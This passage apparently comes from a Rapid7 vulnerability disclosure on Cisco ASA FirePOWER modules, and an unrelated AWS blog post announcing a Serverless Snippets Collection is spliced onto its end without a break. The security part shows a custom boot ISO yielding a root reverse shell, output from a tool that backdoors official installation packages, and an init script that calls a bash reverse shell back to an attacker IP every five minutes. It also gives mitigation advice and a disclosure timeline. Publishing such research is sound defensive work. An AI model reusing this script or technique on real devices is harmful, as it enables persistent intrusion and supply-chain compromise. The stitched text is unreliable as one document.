Type help or '?' for a list of available commands.
ciscoasa> en
Password: 
ciscoasa# copy http://10.0.0.28/tinycore-custom.iso disk0:/tinycore-custom.iso

Address or name of remote host [10.0.0.28]? 

Source filename [tinycore-custom.iso]? 

Destination filename [tinycore-custom.iso]? 

Accessing http://10.0.0.28/tinycore-custom.iso...!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Writing file disk0:/tinycore-custom.iso...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
INFO: No digital signature found
76193792 bytes copied in 18.440 secs (4232988 bytes/sec)

ciscoasa# sw-module module sfr recover configure image disk0:/tinycore-custom.iso
ciscoasa# debug module-boot
debug module-boot  enabled at level 1
ciscoasa# sw-module module sfr recover boot

Module sfr will be recovered. This may erase all configuration and all data
on that device and attempt to download/install a new image for it. This may take
several minutes.

Recover module sfr? [confirm]
Recover issued for module sfr.
ciscoasa# Mod-sfr 177> ***
Mod-sfr 178> *** EVENT: Creating the Disk Image...
Mod-sfr 179> *** TIME: 15:12:04 UTC Jun 13 2022
Mod-sfr 180> ***
Mod-sfr 181> ***
Mod-sfr 182> *** EVENT: The module is being recovered.
Mod-sfr 183> *** TIME: 15:12:04 UTC Jun 13 2022
Mod-sfr 184> ***
Mod-sfr 185> ***
Mod-sfr 186> *** EVENT: Disk Image created successfully.
Mod-sfr 187> *** TIME: 15:13:42 UTC Jun 13 2022
Mod-sfr 188> ***
Mod-sfr 189> ***
Mod-sfr 190> *** EVENT: Start Parameters: Image: /mnt/disk0/vm/vm_1.img, ISO: -cdrom /mnt/disk0
Mod-sfr 191> /tinycore-custom.iso, Num CPUs: 3, RAM: 2249MB, Mgmt MAC: 00:FC:BA:44:54:31, CP MA
Mod-sfr 192> C: 00:00:00:02:00:01, HDD: -drive file=/dev/sda,cache=none,if=virtio, Dev Driver: 
Mod-sfr 193> vir
Mod-sfr 194> ***
Mod-sfr 195> *** EVENT: Start Parameters Continued: RegEx Shared Mem: 0MB, Cmd Op: r, Shared Me
Mod-sfr 196> m Key: 8061, Shared Mem Size: 16, Log Pipe: /dev/ttyS0_vm1, Sock: /dev/ttyS1_vm1, 
Mod-sfr 197> Mem-Path: -mem-path /hugepages
Mod-sfr 198> *** TIME: 15:13:42 UTC Jun 13 2022
Mod-sfr 199> ***
Mod-sfr 200> Status: Mapping host 0x2aab37e00000 to VM with size 16777216
Mod-sfr 201> Warning: vlan 0 is not connected to host network

Once the ISO is booted, a reverse shell is sent back to the attacker.

albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.21 60579
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux box 3.16.6-tinycore #777 SMP Thu Oct 16 09:42:42 UTC 2014 i686 GNU/Linux
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:00:00:02:00:01  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:173 errors:0 dropped:164 overruns:0 frame:0
          TX packets:14 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:9378 (9.1 KiB)  TX bytes:4788 (4.6 KiB)

eth1      Link encap:Ethernet  HWaddr 00:FC:BA:44:54:31  
          inet addr:192.168.1.17  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1482 (1.4 KiB)  TX bytes:1269 (1.2 KiB)

eth2      Link encap:Ethernet  HWaddr 52:54:00:12:34:56  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:14 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:4788 (4.6 KiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Once again, this presents a potential social engineering issue. An attacker that is able to craft their own malicious boot image needs only to convince an administrator to install it. However, an attacker cannot pre-install the image and provide the ASA to a victim because boot images are removed every time the ASA is rebooted.


Malicious FirePOWER installation package

As mentioned previously, step two of the FirePOWER installation process is to install the FirePOWER installation package. Some FirePOWER modules support two versions of the FirePOWER installation package:

[Screenshot: package-handling code from the FirePOWER boot image showing the supported installation package wrapper formats]

The above code is taken from the FirePOWER boot image 6.2.3. We can see it supports two formats:

  • EncryptedContentSignedChksumPkgWrapper
  • ChecksumPkgWrapper

Without getting into the weeds on the details, EncryptedContentSignedChksumPkgWrapper is an overly secure format, and Cisco only appears to publish FirePOWER installation packages in that format. However, the boot images also support the insecure ChecksumPkgWrapper format. So, we wrote a tool that takes in a secure FirePOWER installation package, unpackages it, inserts a backdoor, and then repackages it into the insecure package format.

albinolobster@ubuntu:~/whatsup/build$ ./whatsup -i ~/Desktop/asasfr-sys-5.4.1-211.pkg --lhost 10.0.0.28 --lport 1270
   __      __  __               __    __
  /\ \  __/\ \/\ \             /\ \__/\ \
  \ \ \/\ \ \ \ \ \___      __ \ \ ,_\ \/ ____
   \ \ \ \ \ \ \ \  _ `\  /'__`\\ \ \/\/ /',__\
    \ \ \_/ \_\ \ \ \ \ \/\ \L\.\\ \ \_ /\__, `\
     \ `\___x___/\ \_\ \_\ \__/.\_\ \__\\/\____/
      '\/__//__/  \/_/\/_/\/__/\/_/\/__/ \/___/
   __  __
  /\ \/\ \
  \ \ \ \ \  _____            jbaines-r7
   \ \ \ \ \/\ '__`\              🦞
    \ \ \_\ \ \ \L\ \      "What's going on?"
     \ \_____\ \ ,__/
      \/_____/\ \ \/
               \ \_\
                \/_/

[+] User provided package: /home/albinolobster/Desktop/asasfr-sys-5.4.1-211.pkg
[+] Copying the provided file to ./tmp
[+] Extracting decryption materials
[+] Attempting to decrypt the package... this might take 10ish minutes (and a lot of memory, sorry!)
[+] Successful decryption! Cleaning up extra files
[+] Unpacking...
... snip lots of annoying output ...
[+] Generating the data archive
[+] Creating new.pkg...
[+] Writing file and section headers
[+] Appending the compressed archive
[+] Appending the checksum section
[+] Completed new.pkg

The newly generated FirePOWER installation package can then be installed on the ASA as it normally would. And because it contains all the official installation package content, it will appear to be a normal installation to the user. However, this installation will include the following obviously malicious init script, which will try to connect back to an attacker IP every five minutes.

#!/bin/sh
# Backdoored init script inserted by the repackaging tool: every five minutes
# it attempts a bash reverse shell back to the attacker at 10.0.0.28:1270.

source /etc/rc.d/init.d/functions
PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/sf/bin:/sbin:/usr/sbin"

xploit_start() {
  # Background loop: sleep 300 seconds, then try to connect back, forever.
  (while true; do sleep 300; /bin/bash -i >& /dev/tcp/10.0.0.28/1270 0>&1; done)&
}

case "$1" in
'start')
  xploit_start
  ;;
*)
  echo "usage $0 start|stop|restart"
esac

This malicious FirePOWER installation package is distributable via social engineering, and it can be used in supply chain attacks. The contents of the installation package survive reboots and upgrades. An attacker need only pre-install the FirePOWER module with a malicious version before providing it to the victim.


Mitigation and detection

Organizations that use Cisco ASA are urged to isolate administrative access as much as possible. That is not limited to simply “remove ASDM from the internet.” We’ve demonstrated a few ways malicious packages could reasonably end up on an ASA, and none of those mechanisms have been patched. Isolating administrative access from potentially untrustworthy users is important.

Rapid7 has written some YARA rules to help detect exploitation or malicious packages:

Timeline

  • February 24, 2022 – Initial disclosure of ASDM packaging issues.
  • February 24, 2022 – Cisco opens a case (PSIRT-0917052332) and assigns CSCwb05264 and CSCwb05291 for ASDM issues.
  • February 29, 2022 – Cisco informs Rapid7 they have reached out to engineering. Raises concerns regarding 60-day timeline.
  • March 15, 2022 – Cisco reports they are actively working on the issue.
  • March 22, 2022 – Initial disclosure of ASA-X with FirePOWER Services issues and ASDM logging issue.
  • March 23, 2022 – Cisco acknowledges ASA-X issues and assigns PSIRT-0926201709.
  • March 25, 2022 – Cisco discusses their views on severity scoring and proposes disclosure dates for ASDM issues.
  • March 29, 2022 – Rapid7 offers extension on disclosure for both PSIRT issues.
  • April 7, 2022 – Rapid7 asks for an update.
  • April 7, 2022 – ASA-X issues moved to Cisco PSIRT member handling ASDM issues.
  • April 8, 2022 – Cisco indicates Spring4Shell is causing delays.
  • April 13, 2022 – Rapid7 asks for an update.
  • April 14, 2022 – Cisco indicates the ASA-X issues are as designed and that the ASDM logging issue is a duplicate. Cisco agrees to new disclosure dates and clarifies the six-month timelines; the upcoming Vegas talks help push things along!
  • April 14, 2022 – Rapid7 inquires if Cisco is talking about the same ASA-X model.
  • April 20, 2022 – Rapid7 proposes a June 20, 2022 disclosure. Again asks for clarification on the ASA-X model.
  • April 22, 2022 – Cisco reiterates ASA-X issues are not vulnerabilities.
  • April 22, 2022 – Rapid7 attempts to clarify that the ASA-X issues are vulnerabilities.
  • April 26, 2022 – Cisco plans partial disclosure of ASDM issues around June 20.
  • May 06, 2022 – Cisco reiterates no timeline for ASA checking ASDM signature. Cisco again reiterates ASA-X issues are not vulnerabilities.
  • May 06, 2022 – Rapid7 pushes back again on the ASA-X issues.
  • May 10, 2022 – Rapid7 asks for clarification on what is being fixed/disclosed on June 20.
  • May 11, 2022 – Rapid7 asks for clarity on ASA-X timeline and what is currently being considered a vulnerability.
  • May 18, 2022 – Cisco clarifies which issues are getting fixed, which will receive CVEs, and which are considered a “hardening effort.”
  • May 18, 2022 – Rapid7 requests CVEs, asks about patch vs disclosure release date discrepancy. Rapid7 again reiterates ASA-X findings are vulnerabilities.
  • May 20, 2022 – Cisco indicates CVEs will be provided soon, indicates Cisco will now publish fixes and advisories on June 21. Cisco reiterates they do not consider boot image issues vulnerabilities. Cisco asks who to credit.
  • May 25, 2022 – Rapid7 indicates credit to Jake Baines.
  • May 25, 2022 – CVE-2022-20828 and CVE-2022-20829 assigned, Cisco says their disclosure date is now June 22.
  • May 26, 2022 – Rapid7 agrees to June 22 Cisco disclosure, requests if there is a disclosure date for ASA side of ASDM signature fixes.
  • May 31, 2022 – Cisco indicates ASA side of fixes likely coming August 11.
  • June 09, 2022 – Rapid7 questions the usefulness of boot image hardening. Observes the ASA has no mechanism to prevent literally any bootable ISO from booting (let alone old Cisco-provided ones).
  • June 09, 2022 – Cisco confirms boot images are not phased out and does not consider that to be a security issue.
  • June 09, 2022 – Rapid7 reiterates that the ASA will boot any bootable image and that attackers could distribute malicious boot images / packages and the ASA has no mechanism to prevent that.
  • June 13, 2022 – Rapid7 finally examines Cisco’s assertions regarding the ASDM log password leak being a duplicate and finds it to be incorrect.
  • June 15, 2022 – Cisco confirms the password leak in 7.17(1) as originally reported.
  • June 22, 2022 – Cisco confirms password leak fix will be published in upcoming release.
  • June 23, 2022 – Cisco publishes advisories and bugs.
  • June 23, 2022 – Rapid7 asks if CVE-2021-1585 was fixed.
  • June 23, 2022 – Cisco says it was.
  • June 23, 2022 – Rapid7 says it wasn’t. Asks Cisco if we should open a new PSIRT ticket.
  • June 23, 2022 – Cisco indicates current PSIRT thread is fine.
  • June 23, 2022 – Rapid7 provides details and video.
  • June 23, 2022 – Cisco acknowledges.
  • July 05, 2022 – Rapid7 asks for an update on CVE-2021-1585 patch bypass.
  • July 25, 2022 – Cisco provides Rapid7 with test versions of ASDM.
  • July 26, 2022 – Rapid7 downloads the test version of ASDM.
  • August 1, 2022 – Rapid7 lets Cisco know that team time constraints may prevent us from completing testing.
  • August 1, 2022 – Cisco acknowledges.
  • August 10, 2022 – Rapid7 updates Cisco on publication timing and reconfirms inability to complete testing of new build.
  • August 11, 2022 – Cisco communicates to Rapid7 that they have released new software images for ASA (9.18.2, 9.17.1.13, 9.16.3.19) and ASDM (7.18.1.152) and updated the advisories for CVE-2022-20829 and CVE-2021-1585 to note that the vulnerabilities have been resolved.
  • August 11, 2022 – Rapid7 acknowledges, notifies Cisco that we are unable to verify the latest round of fixes before materials go to press.
  • August 11, 2022 – This document is published.
  • August 11, 2022 – Rapid7 presents materials at Black Hat USA.
  • August 13, 2022 – Rapid7 presents materials at DEF CON.

Rapid7 customers

Authenticated checks were made available to InsightVM and Nexpose customers for the following CVEs in July 2022 based on Cisco’s security advisories:

Please note: Shortly before this blog’s publication, Cisco released new ASA and ASDM builds and updated their advisories to indicate that remediating CVE-2021-1585 and CVE-2022-20829 requires these newer versions. We are updating our vulnerability checks to reflect that these newer versions contain what Cisco has communicated to be the proper fixes.


Introducing the new AWS Serverless Snippets Collection

Post Syndicated from dboyne original https://aws.amazon.com/blogs/compute/introducing-the-new-aws-serverless-snippets-collection/

Today, the AWS Serverless Developer Advocate team introduces the Serverless Snippets Collection. This is a new page hosted on Serverless Land that makes it easier to discover, copy, and share common code that can help with serverless application development.

Builders are writing serverless applications in many programming languages and spend a growing amount of time finding and reusing code that is trusted and tested.

With many online resources and code located within private repositories, it can be hard to find reusable or up-to-date code snippets that you can copy and paste into your applications or use with your AWS accounts. Code examples can soon become out of date or replaced by new best practices.

The Serverless Snippets Collection is designed to enable reusable, tested, and recommended snippets driven and maintained by the community. Builders can use serverless snippets to find and integrate tools, code examples, and Amazon CloudWatch Logs Insights queries to help with their development workflow.

This blog post explains what serverless snippets are and what challenges they help to solve. It shows how to use the snippets and how builders can contribute to the new collection.

Overview

The new Serverless Snippets Collection helps builders explore and reuse common code snippets to help accelerate application development workflows. Builders can also write their own snippets and contribute them to the site using standard GitHub pull requests.

Serverless snippets are organized into a number of categories, initially supporting Amazon CloudWatch Logs Insights queries, tools, and service integrations.

Code snippets can easily become outdated as new functionality emerges and best practices are discovered. Serverless snippets offer a platform where application developers can collaborate together to keep code examples up to date and relevant, while supporting many programming languages.

Snippets can contain code from any programming language. You can include multiple languages within a single snippet, giving you the option to be creative and flexible.

Serverless snippets use tags to simplify discovery. You can use tags to filter by snippet type, programming language, AWS service, or custom tags to find relevant code snippets for your own use cases.

Each snippet type has a custom interface, giving builders a simplified experience and quick deployment methods.

CloudWatch Logs Insights snippets

CloudWatch Logs Insights enables you to interactively search and analyze your log data in CloudWatch Logs. You can use CloudWatch Logs Insights to help you efficiently and effectively search for operational issues and debug your applications.

Serverless snippets contain a number of CloudWatch Logs Insights queries. These help you analyze your applications faster and include tags such as memory, latency, duration, or errors. You can launch queries directly into your AWS Management Console with one click.
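
For context, the kind of Logs Insights query these snippets collect can also be run from the command line. This is a minimal sketch, assuming the AWS CLI is configured and using a hypothetical Lambda log group name; the query lists recent REPORT lines with their billed duration and memory usage:

# Start a CloudWatch Logs Insights query over the last hour (log group is an example)
QUERY_ID=$(aws logs start-query \
  --log-group-name "/aws/lambda/my-function" \
  --start-time $(( $(date +%s) - 3600 )) \
  --end-time $(date +%s) \
  --query-string 'fields @timestamp, @billedDuration, @maxMemoryUsed | filter @type = "REPORT" | sort @timestamp desc | limit 20' \
  --query 'queryId' --output text)

# Results are returned asynchronously; poll until the query status is Complete
aws logs get-query-results --query-id "$QUERY_ID"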

Using CloudWatch Insights snippets

  1. Select CloudWatch Logs Insights as the snippet type and choose View on a snippet.
  2. Select Open in CloudWatch Insights to launch the snippet directly into your AWS account, or copy the code and follow the manual instructions on the page to run the query.

Tool snippets

Another supported snippet type is tools. Builders can search for tools by programming language or AWS service. Tool snippets include detailed instructions on how to install the tool and example usage, with additional resource links. Tools can also be tagged by programming language, allowing you to select the tools for your particular language using the snippet tabs functionality.

To use tools snippets:

  1. Select Tools as the snippet type and choose View on any tool snippet.
  2. Each snippet may have many steps. Follow the instructions documented in the tool snippet to install and use it within your own application.

Integration snippets

Service integrations are part of many applications built on AWS. Serverless snippets include integration type snippets to share integration code between AWS services.

For example, you can add a snippet for Amazon S3 integration with AWS Lambda and split the snippet by programming language.
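
As a sketch of what such a service integration can involve outside of application code, the following CLI commands wire an S3 bucket to invoke a Lambda function on object creation. This is illustrative only; the bucket name, function name, account ID, and Region are placeholder assumptions:

# Allow the S3 bucket to invoke the function (names and ARNs are placeholders)
aws lambda add-permission \
  --function-name my-function \
  --statement-id s3-invoke \
  --action lambda:InvokeFunction \
  --principal s3.amazonaws.com \
  --source-arn arn:aws:s3:::my-bucket

# Configure the bucket to send ObjectCreated events to the function
aws s3api put-bucket-notification-configuration \
  --bucket my-bucket \
  --notification-configuration '{
    "LambdaFunctionConfigurations": [{
      "LambdaFunctionArn": "arn:aws:lambda:us-east-1:123456789012:function:my-function",
      "Events": ["s3:ObjectCreated:*"]
    }]
  }'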

To use integration snippets:

  1. Select Integration as the snippet type and choose View on any integration snippet.
  2. The integration snippets give you examples of how to integrate between AWS services. You can select your desired programming language by selecting the language buttons.

Contributing to the Serverless Snippets Collection

You can write your own snippets and contribute them to the serverless snippets collection, which is stored in the AWS snippets-collection repository. Requests are reviewed for quality and relevancy before publishing.

To submit a snippet (a command-line sketch of the repository steps follows this list):

  1. Choose Submit a Serverless Snippet.
  2. Read the Adding new snippet guide and fill out the GitHub issue template.
  3. Clone the repository. Duplicate and rename the example snippet_model directory (or _snippet-model-multi-files if you want to support multiple files in your snippet).
  4. Add the required information to the README.md file.
  5. Add the required meta information to snippet-data.json.
  6. Add the snippet code to the snippet.txt file.
  7. Submit a pull request to the repository with the new snippet files.
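
For the repository-side steps, the workflow is a standard fork-and-pull-request flow. The following sketch is illustrative only; the repository URL, branch name, and snippet name are assumptions, and the directory names come from the steps above:

# Clone your fork of the snippets-collection repository (URL is a placeholder)
git clone https://github.com/<your-username>/snippets-collection.git
cd snippets-collection

# Duplicate and rename the example snippet directory
cp -r snippet_model my-new-snippet

# Edit the files described in the steps above
$EDITOR my-new-snippet/README.md my-new-snippet/snippet-data.json my-new-snippet/snippet.txt

# Commit on a branch, push, then open a pull request against the upstream repository
git checkout -b add-my-new-snippet
git add my-new-snippet
git commit -m "Add my-new-snippet"
git push origin add-my-new-snippet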

To write snippets with multiple code blocks or to support different runtimes, read the guide.

Conclusion

When building serverless applications, builders reuse and share code across many applications and organizations. These code snippets can be difficult to find across your own applications and local development environments.

Today, the AWS Serverless Developer Advocate team is adding the Serverless Snippets Collection on Serverless Land to help builders search, discover, and contribute reusable code snippets across the world.

The Serverless Snippets Collection includes tools, integration code examples, and CloudWatch Logs Insights queries. The collection supports many types of snippets, examples, and code that can be shared across the community.

Builders can use the custom filter functionality to search for snippets by programming language, AWS service, or custom snippet tags.

All serverless developers are invited to contribute to the collection. You can submit a pull request to the Serverless Snippets Collection GitHub repository, which is reviewed for quality before publishing.

For more information on building serverless applications visit Serverless Land.
